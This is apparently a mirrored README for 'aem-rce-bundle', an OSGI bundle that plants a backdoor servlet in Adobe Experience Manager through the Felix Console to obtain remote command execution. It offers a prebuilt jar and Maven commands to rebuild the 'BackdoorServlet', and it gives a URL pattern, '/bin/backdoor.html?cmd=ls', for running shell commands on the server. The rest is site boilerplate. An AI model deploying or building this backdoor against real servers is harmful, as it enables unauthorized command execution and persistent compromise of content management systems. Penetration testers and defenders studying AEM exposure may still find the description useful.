Code Monkey home page Code Monkey logo

aem-rce-bundle's Introduction

AEM RCE OSGI bundle

OSGI bundle allows to get RCE when you have access to Felix Console. There is pre-build bundle rce.bundle.core-1.0-SNAPSHOT.jar, works for AEM 6.2 or newer.

Build by yourself

Generate new skeleton as described below. Backport BackdoorServlet to newly genearted skeleton and build it with maven.

For AEM 5.6 use following maven command.

mvn org.apache.maven.plugins:maven-archetype-plugin:2.4:generate \
 -DarchetypeGroupId=com.day.jcr.vault \
 -DarchetypeArtifactId=multimodule-content-package-archetype \
 -DarchetypeVersion=1.0.2 \
 -DarchetypeCatalog=https://repo.adobe.com/nexus/content/groups/public/

For AEM 6.0 or newer use following maven command.

mvn org.apache.maven.plugins:maven-archetype-plugin:2.4:generate \
 -DarchetypeGroupId=com.adobe.granite.archetypes \
 -DarchetypeArtifactId=aem-project-archetype \
 -DarchetypeVersion=SELECT_FROM_TABLE \
 -DarchetypeCatalog=https://repo.adobe.com/nexus/content/groups/public/

Select archetype version from the table.

Archetype version AEM version
7 6.0 or newer
8 6.0 or newer
9 6.0 or newer
10 6.0 or newer
11 6.2 or newer
12 6.3 or newer
13 6.4, 6.3 + SP2
14 6.4, 6.3 + SP2

Access the shell

https://aem.webapp/bin/backdoor.html?cmd=ls

aem-rce-bundle's People

Contributors

0ang3el avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.